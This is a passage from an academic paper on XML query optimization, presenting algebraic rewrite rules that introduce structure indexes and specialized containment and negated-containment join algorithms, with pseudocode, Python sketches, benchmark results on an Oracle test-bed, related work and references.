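# Expressions as nested tuples: ("etn", name), ("and", e1, e2) for ∩,
# ("contains", e1, e2) for E1 ⊃ E2.
def r5(e):
    # R5: (E1 ⊃ E2) ∩ E3  ⇒  (E1 ∩ E3) ⊃ E2
    if e[0] == "and" and e[1][0] == "contains":
        (_, (_, e1, e2), e3) = e
        return ("contains", ("and", e1, e3), e2)
    return None

def r6(e):
    # R6: E ∩ E ⇒ E
    if e[0] == "and" and e[1] == e[2]:
        return e[1]
    return None

RULES = [r5, r6]   # precedence: the first applicable rule wins

def rewrite(e):
    """Apply the first applicable rule anywhere in the tree, repeatedly."""
    changed = True
    while changed:
        changed = False
        for rule in RULES:
            new = rule(e)
            if new is not None:
                e, changed = new, True
                break
        else:
            # no rule fired at the top level; recurse into the children
            if isinstance(e, tuple) and len(e) == 3:
                l, r = rewrite(e[1]), rewrite(e[2])
                if (l, r) != (e[1], e[2]):
                    e, changed = (e[0], l, r), True
    return e

q = ("and", ("contains", ("etn", "open_auction"), ("etn", "bidder")),
     ("etn", "open_auction"))
print(rewrite(q))   # ⇒ ("contains", ("etn", "open_auction"), ("etn", "bidder"))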
Straightforward Simplification We observe that most of the simplification carried out at an early stage are beneficial, e.g., E ⊂ E ⇒ E, while some less straightforward simplification if hastily done at a too early stage may cause the whole optimization process to be quickly captured at a local optimal. For example, while a leftward application of ε7 eliminates E3, it takes away the opportunity of applying the structure index between τ(E3) and τ(E2) if such a structure index is indeed available, or later on, a reverse transformation has to be called upon to restore the lost opportunity. Therefore, at the normalization phase we only pursue straightforward simplification, and the simplification rules mostly are only related to the set operations. We furnish a couple of such rules for simplification in the following. R11. σ(E) ∪ E ⇒ E R12. (E1 ⊃ E2 ∪ E1) ⇒ E1 A counterpart of R12 analogously works with the ⊂ operation.
Semantic Optimization
The second phase, semantic optimization, is the core of our optimization approach. The primary goal of this phase is to discover potential opportunities of applying structure indices to a query. Three situations have been identified for this purpose:
• A structure index is available for a ⊃ or ⊂ operation in an input expression, and the index is then simply applied. This is by far the most favorable situation.
• A structure index is available but is not superficially applicable because of an unfavorable pattern that the query expression is in. However, after desired transformations are performed, the index becomes applicable and is used.
• No relevant structure index is available, but after introducing a third element type as an entrance location into a query, a previously irrelevant index becomes relevant and eventually gets applied.
In summary, the first situation applies a structure index effortlessly, the second situation makes an “inapplicable” index applicable, and the third situation makes an “irrelevant” index relevant and applied. In the following, we present sample rules that exploit the usage of structure indexes corresponding to each of these situations: 1.
Applying readily available structure indices: For an input (sub)query of form “E1 ⊃ E2”, if a structure index between the two involved element types, τ(E1) and τ(E2), happens to be available, our strategy firmly grasp this opportunity and applies the index by invoking the following transformation rule (where the parameter τ(E1), appearing as a subscript of the index operator I , indicates the resultant type of the index operation; a similar rule holds for ⊂).
R13. (E1 ⊃ E2) ⇒ (Iτ(E1)(E2) ∩ E1) if a structure index is available between τ(E1) and τ(E2) 2.
Making an “inapplicable” structure index applicable: There are chances that a relevant structure index is available but not applicable because of the particular pattern that a query expression is in. Nevertheless, the applicability of the structure index to the query can enabled by desired transformations rendered by the commutativity and/or associativity laws w.r.t. ⊃ and ⊂ in the ePAT algebra. Specifically, the following transformation rules can be used (note the counterparts of R14 and R15 analogously work for ⊂):
R14. (E1 ⊃ (E2 ⊃ E3)) ⇒ ((E1 ⊃ E2) ⊃ E3) if there exists a structure index between τ(E1) and τ(E2), and τ(E2) is an EL for τ(E1) and τ(E3) R15. (E1 ⊃ (E2 ⊃ E3)) ⇒ ((E1 ⊃ E3) ⊃ E2) if there exists a structure index between τ(E1) and τ(E3), and τ(E2) is an EL for τ(E1) and τ(E3) R16. (E1 ⊂ (E2 ⊃ E3)) ⇒ ((E1 ⊂ E2) ⊃ E3) if there exists a structure index between τ(E1) and τ(E2), and τ(E1) is an EL for τ(E2) and τ(E3) R17. (E1 ⊃ (E2 ⊂ E3)) ⇒ ((E1 ⊃ E2) ⊂ E3) if there exists a structure index between τ(E1) and τ(E2), and τ(E1) is an EL for τ(E2) and τ(E3) These rules are a result of a guided application of the equivalences that relate to the entrance location notion. A comprehensive list of the rules can be found in Che et al. (2006). 3.
Making “irrelevant” structure indexes relevant and applicable: For an input query, if there is no structure index found relevant, our approach checks whether it is possible to make a related index relevant by introducing an entrance location (a new element type) into the query (a related index is one that relates to just one of the involved element types, and thus is not quite relevant). To explore this kind of opportunities, we need specialized (and more complex) transformation rules that check specific structural properties (e.g., those connoted by the exclusivity and/or obligation notions, in addition). Our approach examines numerous cases, from most beneficial to least favorable in a heuristic point of view, in order to achieve the previous goal. In many of these cases, element type substitution is performed so that an opportunity of bringing a potential structure index into a query is discovered. After a desired transformation is performed,
R13 is then called during the next iteration to secure the application of an identified potential structure index. The transformation rules corresponding to the four most favorable cases were identified in our prior work (Che et al., 2006) are presented next: R18. (E1 ⊂ E2) ⇒ (E1 ⊂ E3) if E3 is an EL for τ(E1) and τ(E2) and is exclusively contained in τ(E2), free(E2), and a structure index between τ(E3) and τ(E1) is available R19. (E1 ⊃ E2) ⇒ (E1 ⊃ E3) if E3 is an EL for τ(E1) and τ(E2) and obligatorily contains τ(E2), free(E2), and a structure index between τ(E3) and τ(E1) is available R20. (E1 ⊂ E2) ⇒ (E1 ⊂ E3) if τ(E2) is an EL for τ(E1) and τ(E3) and is exclusively contained in τ(E3), free(E2), and a structure index between τ(E3) and τ(E1) is available R21. (E1 ⊃ E2) ⇒ (E1 ⊃ E3) if τ(E2) is an EL for τ(E1) and τ(E3) and obligatorily contains τ(E3), free(E2), and a structure index between τ(E3) and τ(E1) is available In the previous rules, the free(E) condition is used to denote that the evaluation of the expression E is required to return the full extent of type τ(E). free(E) trivially holds for every etn, which is the primary intended use of this predicate. With nontrivial expression E (i.e., a non etn expression), database statistics can be used to quickly determine whether the predicate holds without physically accessing the database. If introducing a structure index into a query is impossible, our approach switches to a less favorite choice—that is, merely reducing the navigation paths required by a query. This kind of rules are relatively less interesting, especially when efficient structural join algorithms (e.g., Chien, Vagena, Zhang, Tsotras, & Zaniolo, 2002; Srivastava et al., 2002) are available for implementing the general containment operations. It is worth to mention that there may exist alternatives to the new element type E3 inter-
polated by the previous rules into a query (as an entrance location). In order to retain our framework deterministic under all circumstances, we developed an algorithm that searches the optimal entrance location for these rules. This algorithm is discussed in detail in Che et al. (2006).
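As a toy illustration of what rule R13 buys once a structure index is available, the sketch below (Python; the ids, extents, and index contents are hypothetical, and the index is simply modeled as a precomputed ancestor-to-descendants map, in the spirit of the test-bed's materialized join results) answers E1 ⊃ E2 by a lookup plus an intersection instead of a fresh containment computation:

# A structure index between open_auction and bidder, modeled as the
# precomputed result of the structural join, keyed by ancestor id.
idx_open_auction_bidder = {1: [10, 11], 3: [12]}   # open_auction id -> bidder ids

open_auction_extent = [1, 2, 3]
selected_bidders = {11, 12}      # e.g., the result of a selection over bidder

# R13-style evaluation of  open_auction ⊃ σ(bidder):
# consult the index and intersect with the open_auction extent.
result = [a for a in open_auction_extent
          if any(b in selected_bidders for b in idx_open_auction_bidder.get(a, []))]
print(result)    # [1, 3]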
Simplification The third phase, simplification, re-invokes most of the simplification rules covered by Phase 1. This is necessary because, after major transformations being performed for semantic optimization (the second phase), new redundancies may be introduced, especially when new element types (as entrance locations) are interpolated. The rules that enforce DTD-constraints and reorder operators do not need to be called again as semantic optimization does not introduce new inconsistencies with the DTD-constraints nor causes major structural changes in the queries. Besides, at this point we expect a thorough clean up on the optimized queries, and for this purpose, we add two new types of rules to the third phase. Firstly, the following rules are added to remove the ∩ operations that may be reintroduced together with a structure index operation: R22. (Iτ(E1)(E2) ∩ E1) ⇒ (Iτ(E1)(E2)) if free(E1) R23. (I τ(E1)(E2) ∩ σ(E1)) ⇒ σ(I τ(E1)(E2)) if free(E1) Secondly, toward thorough clean up, we add the following rules that carry out deep clean up by exploiting relevant structure knowledge (as characterized by the three notions: exclusivity, obligation, and entrance location). A few such rules as examples are given next: R24. E1 ⊂ E2 ⇒ E1 if τ(E1) is exclusively contained in τ(E2) R25. (E1 ⊂ (E3 ⊂ E2)) ⇒ (E1 ⊂ E2) if τ(E3) is an EL for τ(E1) and τ(E2), and free(E3) R26. (E1 ⊂ (E3 ⊃ E2)) ⇒ (E1 ⊃ E2) if τ(E1) is
an EL for τ(E3) and τ(E2) and obligatorily contained in τ(E3), and free(E3)
An Optimization Example
In the following, we show the transformations applied to the example query introduced in the second section:
(keyword ⊂ (description ⊂ (open_auction ⊃ σa=‘personref’, r=‘123’(bidder))))
⇒ (by the ⊂ counterpart of R14, i.e., ⊂ associativity)
((keyword ⊂ description) ⊂ (open_auction ⊃ σa=‘personref’, r=‘123’(bidder)))
⇒ (by the ⊂ counterpart of R15, i.e., ⊂ commutativity)
((keyword ⊂ (open_auction ⊃ σa=‘personref’, r=‘123’(bidder))) ⊂ description)
⇒ (by R13, i.e., index introduction)
((Ikeyword(open_auction ⊃ σa=‘personref’, r=‘123’(bidder)) ∩ keyword) ⊂ description)
⇒ (by R22, i.e., ∩ deletion)
((Ikeyword(open_auction ⊃ σa=‘personref’, r=‘123’(bidder))) ⊂ description)
⇒ (by R24, i.e., simplification based on exclusivity)
(Ikeyword(open_auction ⊃ σa=‘personref’, r=‘123’(bidder)))
SUPPORT FOR PURE AND NEGATED CONTAINMENTS While structural joins (Srivastava et al., 2002; Zhang et al., 2001) have been widely recognized as important primitives for evaluating the containment operations that are at the core of XML queries, there are aspects of containment operations that necessitate specialized algorithms. This important issue however, does not seem to receive sufficient attentions from other researchers. Pure and negated containments represent two special but important cases of containment operations. Structural joins are proper for the situation when both operands are required for output or for serving a subsequent operation during query evaluation. Nevertheless, this does not cover all the cases that the structural relationships (typically via containment operations) need to be involved in an XML query. A rather common situation is when a query (or a sub-query) simply asks for qualified elements from one operand, for example, “find all the items listed in Australia,” assuming the XMark dataset (Schmidt et al., 2002) is used. This query can be formatted as the following ePAT expression: item ⊂ Australia. This query involves a pure containment operation that needs to return only the elements from the first operand, while the second operand in this query is used only to help screen the elements from the first operand. This query, as consisting of a pure containment operation, is thus referred to as a pure containment query. If, instead, a general structural join as defined in Srivastava et al. (2002) and Zhang et al. (2001) is used for answering this query, the query plan shall consist of the following three nontrivial steps: performing the structural join, projecting the result to the left operand, and eliminating duplicates from result set. Alternatively, if the query engine calls for a specialized algorithm that directly computes the pure containment semantics of ⊂ as defined in ePAT (see the last section), the evaluation plan
of this query then comprises just a single evaluation step (i.e., the invocation of this specialized containment algorithm, which may also be called a pure containment join or containment join for short). Now, an arising question is will this single algorithm be more efficient than the previous three-step evaluation plan? The answer is an absolute yes, in fact, this pure containment join
is much cheaper than a corresponding structural join alone, not to mention the other two extra steps required by the first plan that uses a general structural join. Containment joins come in two different forms. In our work, the one that computes ⊂ is called ICJoin (the “Is-Contained” Join), and the one that computes ⊃ is called CJoin (the “Contains”
Figure 2. The ICJoin algorithm calculating “D ⊂ A”

Algorithm ICJoin(DList, AList)
/* the algorithm computes the result of “D ⊂ A” */
input: DList of type D and AList of type A; both in sorted order of startPos and all elements having the same docId
output: OList holding the sublist of DList that satisfies “D ⊂ A”
begin
  a = AList->firstNode; OList = NULL;
  for (d = DList->firstNode; d != NULL; d = d->nextNode) {
    /* advance a to the first node of AList that could still contain d */
    while (a.end < d.end && a->hasNextNode()) a = a->nextNode;
    /* d qualifies if the current a properly contains it */
    if (a.begin < d.begin && a.end > d.end) add d to OList
  } /* end of for loop */
end
Figure 3. The CJoin algorithm calculating “A ⊃ D”

Algorithm CJoin(AList, DList)
/* the algorithm computes the result of “A ⊃ D” */
input: AList of type A and DList of type D; both in sorted order of startPos and all elements having the same docId
output: OList holding the sublist of AList that satisfies “A ⊃ D”
begin
  d = DList->firstNode; OList = NULL;
  for (a = AList->firstNode; a != NULL; a = a->nextNode) {
    /* advance d to the first node of DList that could be a descendant of a */
    while (d.begin < a.begin && d->hasNextNode()) d = d->nextNode;
    /* a qualifies if it properly contains the current d */
    if (a.begin < d.begin && a.end > d.end) add a to OList
  } /* end of for loop */
end
Join). The pseudo code of the two algorithms are respectively given in Figures 2 and 3. In these algorithms, we adopt the same numbering scheme for elements as in Srivastava et al. (2002) (i.e., DocId, StartPos : EndPos, LevelNum), which
uniquely encodes the doc-id, the start and end position of an element, and the nesting level of the element in the DOM tree of the source document. With both algorithms, the AList (a list of potential ancestors) and DList (a list of potential
Figure 4. The NICJoin algorithm calculating the negated containment “D ⊄ A”

Algorithm NICJoin(DList, AList)
/* the algorithm computes the result of “D ⊄ A”, i.e., the negated form of ICJoin */
input: DList of type D and AList of type A; both in sorted order of startPos and all elements having the same docId
output: OList holding the sublist of DList that satisfies “D ⊄ A”
begin
  OList = DList;                 /* start from all candidate descendants */
  a = AList->firstNode;
  for (d = DList->firstNode; d != NULL; d = d->nextNode) {
    /* advance a to the first node of AList that could still contain d */
    while (a.end < d.end && a->hasNextNode()) a = a->nextNode;
    /* if a properly contains d, then d does not belong to the result */
    if (a.begin < d.begin && a.end > d.end) remove d from OList
  } /* end of for loop */
end
Figure 5. The NCJoin algorithm calculating the negated containment “A ⊅ D”

Algorithm NCJoin(AList, DList)
/* the algorithm computes the result of “A ⊅ D”, i.e., the negated form of CJoin */
input: AList of type A and DList of type D; both in sorted order of startPos and all elements having the same docId
output: OList holding the sublist of AList that satisfies “A ⊅ D”
begin
  OList = AList;                 /* start from all candidate ancestors */
  d = DList->firstNode;
  for (a = AList->firstNode; a != NULL; a = a->nextNode) {
    /* advance d to the first node of DList that could be a descendant of a */
    while (d.begin < a.begin && d->hasNextNode()) d = d->nextNode;
    /* if a properly contains the current d, then a does not belong to the result */
    if (a.begin < d.begin && a.end > d.end) remove a from OList
  } /* end of for loop */
end
Figure 6. ANMPMJIN: A straightforward counterpart of MPMGIN for negated containments

Algorithm ANMPMJIN(list1, list2)
/* outputs the items of list1 that do not (directly) contain any item of list2 */
begin
  copy list1 to list3
  set cursor1 at beginning of list1
  set cursor2 at beginning of list2
  set cursor3 at beginning of list3
  while (cursor1 != end of list1 and cursor2 != end of list2) do
    if (cursor1.docno < cursor2.docno) then
      cursor1++; cursor3++
    else if (cursor2.docno < cursor1.docno) then
      cursor2++
    else
      mark = cursor2
      while (cursor2.position < cursor1.position and cursor2 != end of list2) do
        cursor2++
      endwhile
      if (cursor2 == end of list2) then
        cursor1++; cursor3++
        cursor2 = mark
      else if (cursor1.val (directly) contains cursor2.val) then
        remove cursor3.val from list3   /* cursor1's element does contain something */
        cursor1++                        /* removal leaves cursor3 at the next element of list3 */
        cursor2 = mark
      else
        cursor1++; cursor3++             /* no element of list2 falls inside cursor1's element */
        cursor2 = mark
      endif
    endif
  endwhile
  output list3
end
descendants) are scanned just once, and there is no need to use any stacks or queues (this is in contrast to the tree-merge and stack-tree algorithms presented in Srivastava et al., 2002). Both algorithms have a time complexity of Θ(|AList| + |DList|), while all the structural join algorithms proposed in the papers (Srivastava et al., 2002; Zhang et al., 2001) have a complexity of O(|AList| + |DList| + |OutputList|), where
|OutputList| alone can be on the scale of |AList| * |DList|, which is far larger than |AList| + |DList|. The performance advantage of the pure containment joins over general structural joins thus becomes obvious. This superiority gets further amplified when the extra operations (which may be required if a general structural join is used instead) are taken into account, as illustrated by the example given at the beginning of this section.
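For readers who prefer runnable code over pseudocode, the following Python sketch mirrors the single-cursor logic of ICJoin (Figure 2). Elements are reduced to (start, end) pairs from the same numbering scheme, the lists are assumed to be sorted by start position within a single document, and the sketch inherits the same assumptions the figures make about how the two lists interleave:

def ic_join(d_list, a_list):
    """Single-pass sketch of ICJoin: return the elements of d_list that are
    contained in some element of a_list (both sorted by start position)."""
    out = []
    if not a_list:
        return out
    i = 0                                # cursor into the candidate ancestors
    for d_start, d_end in d_list:
        # skip ancestors that end before d ends; they cannot contain d
        while i < len(a_list) - 1 and a_list[i][1] < d_end:
            i += 1
        a_start, a_end = a_list[i]
        if a_start < d_start and a_end > d_end:
            out.append((d_start, d_end))
    return out

# keyword elements vs. description elements, encoded as (start, end) intervals
keywords = [(5, 6), (14, 15), (30, 31)]
descriptions = [(3, 10), (12, 20)]
print(ic_join(keywords, descriptions))   # [(5, 6), (14, 15)]

CJoin is symmetric: the roles of the two lists are swapped and the qualifying element is taken from the ancestor list.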
From our specialized containment join algorithms (see Figures 2 and 3), we further derive the negated counterparts for the operations ⊂ and ⊃, respectively. These two algorithms are shown in Figures 4 and 5, correspondingly. As can be seen, NICJoin and NCJoin both reverse the logic of their non-negated counterparts. That is, for example, whenever a qualified descendant is identified by ICJoin, it is excluded from output by NICJoin. NICJoin and NCJoin share the same time complexity as their counterparts. Applying negated containment joins to negated containment queries (i.e., queries involving negated containments like the example that is to be addressed at the end of this section) is yet another persuasive case demonstrating the advantage of resorting to specialized containment joins. In Che (2005), two alternative algorithms (i.e., NMPMJIN and NSTD) for computing negated containments were presented that are based on direct modification on the two well-known structural join algorithms, MPMJIN in Zhang et al. (2001) and Stack-Tree-Desc in Srivastava et al. (2002), respectively. NMPMJIN and NSTD were aligned to the same style and numbering scheme adopted by Stack-Tree-Desc. In the following, we present an alternated version of NMPMJIN (Che, 2005), which is straightforwardly revised from MPMJIN for ease of comparison. We refer to this algorithm as ANMPMJIN. ANMPMJIN is the algorithm that we implemented in our test-bed and for the experimental study to be reported in Section 6 (and MPMJIN is the counterpart structural join algorithm adopted by our test-bed). ANMPMJIN follows exactly the same logic as MPMGIN (Zhang et al., 2001). It accepts two sorted lists of items as input and outputs a list of items (usually a sub list of the first input list) that do not have a containment relationship with any item from the second input list. ANMPMJIN has two levels of nested loops (while MPMGIN has three). The worst-case time complexity of ANMPMJIN is O(n2) (comparing with O(n3) of the original MPMGIN).
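In the same illustrative spirit, a negated counterpart in the style of NICJoin (Figure 4), again assuming sorted (start, end) pairs within one document and not the author's implementation, keeps exactly the descendants for which no containing ancestor is found:

def nic_join(d_list, a_list):
    """Return the elements of d_list that are NOT contained in any element
    of a_list (both lists sorted by start position, same document)."""
    out = []
    i = 0
    for d_start, d_end in d_list:
        while a_list and i < len(a_list) - 1 and a_list[i][1] < d_end:
            i += 1
        contained = bool(a_list) and a_list[i][0] < d_start and a_list[i][1] > d_end
        if not contained:
            out.append((d_start, d_end))
    return out

keywords = [(5, 6), (14, 15), (30, 31)]
descriptions = [(3, 10), (12, 20)]
print(nic_join(keywords, descriptions))   # [(30, 31)]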
Finally, we look at an example query that has a negated containment operation – a so-called negated containment query. Assume this query asks for open_auctions that have not received a bid, which is formatted as “open_auction − (open_auction ⊃ bidder).” A reasonable plan (an ePAT expression) for this query is “open_auction − πopen_auction(open_auction ×⊃ bidder),” which means a structural join algorithm (e.g., MPMGIN) is to be called first for computing the operation ×⊃; then a leftward projection is invoked for computing πopen_auction; after that, duplicates are eliminated, and finally the difference is computed. This plan consists of four steps. A much better alternative plan is “open_auction ⊅ bidder,” assuming a dedicated algorithm like ANMPMJIN for computing the “⊅” operation is implemented. The superiority of the second plan is obvious if we consider that ⊅ is the only operation needed and its implementation (e.g., ANMPMJIN) is more efficient than MPMGIN alone (O(n2) vs. O(n3)), not to mention the three extra operations remaining in the first evaluation plan, which all come with a nontrivial cost.
EXPERIMENTS In order to evaluate our new optimization approach that has integrated support for pure and negated containments, we conducted an experimental study. As our new approach is adapted from the deterministic optimization approach, we presented previously in Che et al. (2006), and the effectiveness, efficiency, and scalability of the general approach has been inherited. Herein, we only show the performance advantage of this newly adapted approach as compared with the prior version of the approach (Che et al., 2006). Our prototype system is implemented in the Java programming language and the Oracle RDBMS is used as a fast platform for storage management (however, our optimization approach is platform independent per se). Query processing in our test-bed consists of the following steps:
translation from XQuery to ePAT expressions, logical optimization performed on ePAT expressions, translation from optimized ePAT expressions to Oracle SQL, and SQL query execution by Oracle query engine. Our test-bed is set in a typical client/server database environment. The client side runs Oracle SQL*Plus (Release 8.1.6.0.0) on Window XP Pro, and the CPU is a Celeron processor of 500MHZ with 192MB RAM. The server side runs an Oracle8i Enterprise Edition (Release 8.1.6.0.0) database server, installed on Sun Ultra 5 with an UltraSparc-II CPU of 333MHZ and a RAM of 512MB. For this test, the benchmark databases and queries are the same as in Che et al. (2006). Here we present the result of our test with only Database 1, which is a synthesized one based on a rather practical DTD (Che et al., 2006) for conference proceedings. The characteristics of this database are shown in Table 1 (The database
was populated at different scales; Table 1 shows the statistics at the representative scales, 1, 5, and 10). The benchmark queries and their selectivities are shown in Table 2. The performance data (obtained when the database was populated at scale 10) are illustrated in Figure 7. From Figure 7, one can see that the new approach with dedicated support for pure and negated containments outperform the old approach by several times. This is true for both optimized and non-optimized queries. This observation further means that the performance gain of the new approach is mainly from the contribution of the specialized containment join algorithms integrated within the new approach; these specialized algorithms (as additional primitives) can be broadly and separately applied to other XML querying systems. Finally, before concluding this section, we would like to point out: analytically, we believe ICJoin and CJoin (and their negated counterparts,
Table 1. Characteristics of database 1 at scale 1, 5, and 10 (cardn. stands for cardinality)

Scale | Size (MB) | #Docs | #Elements  | Max degree | Min degree | Depth | Max cardn. | Min cardn.
1     | 28.93     | 100   | 1,206,221  | 20         | 1          | 6     | 421,681    | 100
5     | 138.80    | 500   | 5,763,581  | 20         | 1          | 6     | 2,125,564  | 500
10    | 252.40    | 1000  | 11,546,873 | 20         | 1          | 6     | 3,695,219  | 1000
Table 2. Database 1 benchmark queries and properties (select indicates the selectivity of a query; optimize records its optimization time in seconds)

Q1: //Article[./Title ft contains "Data Warehousing" or ./Keywords ft contains "Data Warehousing"]  (select: 2.0%, optimize: 0.192)
Q2: //Article[./Title ft contains "Data Warehousing"]/Abstract  (select: 1.1%, optimize: 0.153)
Q3: //Article[./Title ft contains "Data Warehousing"]/Sections/Section[@title="Introduction"]/Paragraph  (select: 6.4%, optimize: 0.769)
Q4: //Article[.//Surname ft contains "Aberer"]  (select: 2.3%, optimize: 0.737)
Q5: //Section/Paragraph[@title="Summary"]  (select: 1.8%, optimize: 0.841)
Q6: //(Article | ShortPaper)//Paragraph[. ft contains "Multidimension" or . ft contains "OLAP"]  (select: 1.1%, optimize: 2.221)
NICJoin and NCJoin) should bring further improvement in query performance because they all have a linear time complexity, as shown in the last section (at this time our experiments are based on ANMPMJIN and NMPMJIN only).
Figure 7. Performance comparison: new approach with special containment join support vs. previous approach without special support (Opt, Non-opt, OptN, and Non-optN stand for optimized and non-optimized queries with regard to our previous and new adapted approach, respectively)

RELATED WORK
Now we briefly review some related work. Lore (McHugh, Abiteboul, Goldman, Quass, & Widom, 1997; McHugh & Widom, 1999) is a DBMS originally designed for semi-structured data and later migrated to an XML-based data model. The Lore optimizer is cost-based and does not perform logic-level optimization. The work in Consens and Milo (1994) is one of the early works reported on using DTD knowledge for query transformations. The DTDs considered there are much simpler than those of XML. In Fernandez and Suciu (1998), a comparable strategy for exploiting a grammar specification for query optimization over semi-structured data is studied. In that study, efforts were made on how to make complete use of the available grammar to expand a query. Our focus is different—we identify transformations that introduce “guaranteed” improvements on query expressions from a heuristic point of view. In Chung and Kim (2002), a fresh idea about using the DTD of XML documents to guide the query processor’s behavior was proposed, where the same type of elements (corresponding to the same node in the DTD-graph) is further classified according to the diverging paths from the type node. Query processing is then guided to a more specific class of the elements of this type to prune the search space. This classification information can effectively guide the query engine to narrow the search space and speed up query evaluation. But with a relatively complex DTD, too many classes may be produced. In Wang and Liu (2003), based on the notion of rooted paths, two types of optimization were proposed: path complementing (i.e., if the path in a path query has a complement and its evaluation is cheaper, then the complement substitutes for the original path) and path shortening (i.e., if the head segment of a path is the unique one that reaches the ending point of the segment, then this segment is removed). The path shortening idea is similar to ours (Che, 2005; Che et al., 2006). However, our algorithm is more general and may identify more opportunities for reducing a path (which in our approach does not need to be rooted). In Buneman, Fan, and Weinstein (1999), path constraints were used to convey the semantics of semi-structured
Execution time (in milliseconds)
Figure 7. Performance comparison: new approach with special containment join support vs. previous approach without special support (Opt, Non-opt, OptN, and Non-optN stand for optimized and nonoptimized queries in regard to our previous and new adapted approach, respectively) 10000 9000 8000 7000
Non-optN OptN Non-opt
6000 5000
Opt
4000 3000 2000 1000 0 Q1
Q2
Q3
Q4
Q5
Q6
Queries
2075
A Deterministic Approach to XML Query Processing
data and applied to query optimization. It is worth noticing that there are two types of semantics with regard to XML data: data semantics (i.e., the meanings of the data) and structure semantics (i.e., the knowledge about the general structure or structural relationships among the data elements). The path constraints investigated in Buneman et al. (1999) are restricted to data semantics only. Our approach exploits structural semantics. Path and tree pattern matching form the core of XML query processing. A number of approaches (Bremer & Gertz, 2003; Grust, 2002; Li & Moon, 2001; Srivastava et al., 2002; Zhang et al., 2001) have been proposed for supporting path and tree pattern matching, commonly known as structural joins. These approaches focus on composing the path/tree query patterns node-by-node through pair-wise matching of ancestor and descendant or parent and child nodes. These approaches have performance advantages over the simple path navigation method and have been integrated with our deterministic optimization approach in our prototype implementation. Distinctively, we provide direct support for pure and negated containments (which are common in XML queries) and have developed a family of specialized supporting algorithms, which showed performance potential. To the best of our knowledge, our work as reported in Che et al. (2006) and in this article is the only one that uses algebraic transformations extensively to exploit structural properties and other important optimization heuristics for XML query optimization, and our work is the only one that integrates special containment join algorithms with a deterministic optimization approach.
SUMMARY
In this article, we presented an innovative, logic-level optimization approach, which is particularly adapted for dealing with XML queries that may contain special containments such as pure and negated containments. Regular structural join algorithms cannot be efficiently applied to these kinds of queries. The uniqueness of our work lies in two aspects: first, we applied a deterministic approach to XML query optimization, which shows great potential for improved optimization performance; second, we proposed dedicated algorithms for special containment operations (i.e., pure and negated containments) in the context of XML query processing. Our experimental study confirmed the validity and performance advantage of the presented new approach and the proposed special containment join algorithms.
REFERENCES
Böhm, K., Aberer, K., Özsu, M. T., & Gayer, K. (1998). Query optimization for structured documents based on knowledge on the document type definition. In Proceedings of IEEE International Forum on Research and Technology Advances in Digital Libraries (ADL’98) (pp. 196-205), Santa Barbara, California, April 22-24, 1998.
Böhm, K., Aberer, K., Neuhold, E. J., & Yang, X. (1997). Structured document storage and refined declarative and navigational access mechanisms in HyperStorM. The VLDB Journal, 6(4), 296-311.
Boag, S., Chamberlin, D., Fernandez, M. F., Florescu, D., Robie, J., & Simeon, J. (2006). XQuery 1.0: An XML query language. Retrieved from http://www.w3.org/TR/xquery/
Bremer, J. M., & Gertz, M. (2003). An efficient XML node identification and indexing scheme. University of California at Davis. Technical Report, 2003 (http://www.db.cs.ucdavis.edu/papers/TR CSE-2003-04 BremerGertz.pdf).
Buneman, P., Fan, W., & Weinstein, S. (1999). Query optimization for semistructured data using path constraints in a deterministic data model. In Proceedings of DBPL Conference (pp. 208-223).
A Deterministic Approach to XML Query Processing
Chan, C. Y., Felber, P., Garofalakis, M., & Rastogi, R. (2002). Efficient filtering of XML documents with XPath expressions. In Proceedings of the International Conference on Data Engineering (pp. 235-244), San Jose, California, February 2002. Chan, C. Y., Garofalakis, M. N., & Rastogi, R. (2002). RE-Tree: An efficient index structure for regular expressions. In Proceedings of VLDB Conference (pp. 263-274), Hong Kong, China, 2002.
Consens, M., & Milo, T. (1994). Optimizing queries on files. In Proceedings of ACM SIGMOD International Conference on Management of Data (pp. 301-312), Minneapolis, Minnesota, May 1994. Fernandez, M. F., & Suciu, D. (1998). Optimizing regular path expressions using graph schemas. In Proceedings of the 14th International Conference on Data Engineering (pp. 14-23), Orlando, Florida, USA, February 23-27, 1998.
Che, D. (2005). Accomplishing deterministic XML query optimization. Journal of Computer Science and Technology, 20(3), 357-366.
Frasincar, F., Houben, G. J., & Pau, C. (2002). XAL: An algebra for XML query optimization. In Proceedings of the 13th Australasian Database Conference, (ADC2002) (pp. 49-56).
Che, D. Efficiently processing XML queries with support for negated containments. International Journal of Computer & Information Science, 6(2), 119-120.
Gottlob, G., Koch, C., & Pichler, R. (2002). Efficient algorithms for processing XPath queries. In Proceedings of VLDB Conference (pp. 95-106), Hong Kong, China, 2002.
Che, D. (2003). Implementation issues of a deterministic transformation system for structured document query optimization. In Proceedings of the 7th International Database Engineering and Applications Symposium (pp. 268-277), Hong Kong, July 16-18, 2003.
Graefe, G., & DeWitt, D. (1987). The EXODUS optimizer generator. In Proceedings of ACM SIGMOD International Conference on Management of Data (pp. 160-172), May 1987.
Che, D., Aberer, K., & Özsu, M. T. (2006). Query optimization in XML structured-document databases. The VLDB Journal, 15(3), 263-289. Chien, S. Y., Vagena, Z., Zhang, D., Tsotras, V. J., & Zaniolo, C. (2002). Efficient structural joins on indexed XML documents. In Proceedings of VLDB Conference (pp. 263-274), Hong Kong, August 20-23, 2002. Chung, T. S., & Kim, H. J. (2002). XML query processing using document type definitions. Journal of Systems and Software, 64(3), 195-205. Clark, J., & DeRose, S. (1999). XML path language (XPath) Version 1.0. Retrieved from http://www. w3.org/TR/1999/REC-xpath-19991116
Grust, T. (2002). Accelerating XPath location steps. In Proceedings of ACM SIGMOD Conference (pp. 109-120), 2002. Guha, S., Jagadish, H. V., Koudas, N., Srivastava, D., & Yu, T. (2002). Approximate XML joins. In Proceedings of the ACM SIGMOD Conference (pp. 287-298), 2002. Jagadish, H. V., Lakshmanan, L. V. S., Srivastava, D., & Thompson, K. (2001). TAX: A tree algebra for XML. In Proceedings of DBPL Conference (pp. 149-164), Rome, Italy, 2001. Li, Q., & Moon, B. (2001). Indexing and querying XML data for regular path expressions. In Proceedings of VLDB Conference (pp. 361-370), Rome, Italy, September 2001. McHugh, J., & Widom, J. (1999). Query optimization for XML. In Proceedings of VLDB
